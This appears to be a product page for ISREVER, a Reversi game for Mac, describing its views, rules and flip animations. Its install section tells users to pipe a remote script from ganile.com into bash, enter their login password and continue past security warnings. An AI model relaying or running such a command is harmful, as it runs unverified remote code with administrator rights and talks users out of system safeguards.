Double-tap (or double-click) anywhere on the board and the camera instantly snaps to a top-down, 2D-style view — perfect for reading the lines and anticipating flips. Double-tap again to rotate the board 90°, then return to the 3D view with one last tap. The best of both worlds, without ever leaving the game.

The timeless rules of Reversi, made crystal clear by animations. One game and you've got it. A hundred games and you're still chasing the perfect sequence of moves.

Place a disc of your colour so that it flanks one or more lines of your opponent's discs between the new disc and one of yours. Every flanked disc switches to your side. The pink player opens, the cyan player replies.
When a move flips a whole line, the discs turn one after another in a cascade, like dominoes, each spinning on its own axis. A big flip (5 discs or more) even triggers a special sound.
A disc played in a corner can never be flipped again: it's the anchor around which games are won. At the end, when no one can move, the discs are counted — most discs wins. Simple to say, hard to master.

Installation takes ten seconds

Download ISREVER, drag the app into your Applications folder, enable it manually with a single Terminal command (a one-time step, to authorise the app on your Mac), then launch ISREVER. That's it: no account, no dependencies to install.

Terminal step to authorize ISREVER on your Mac

curl install alternative

This script downloads the latest official version from ganile.com's server and installs it straight into your Applications folder, ready to use:

  1. Open Terminal (in /Applications/Utilities/).
  2. Copy this command, paste it into Terminal, then press Enter to run it:
    curl -fsSL https://ganile.com/isrever/downloads/install.sh | bash
  3. Enter your password if asked (the one you use to log in to your Mac). You may see a security warning — that's normal: continue.
  4. Terminal shows the download, then the installation progress.
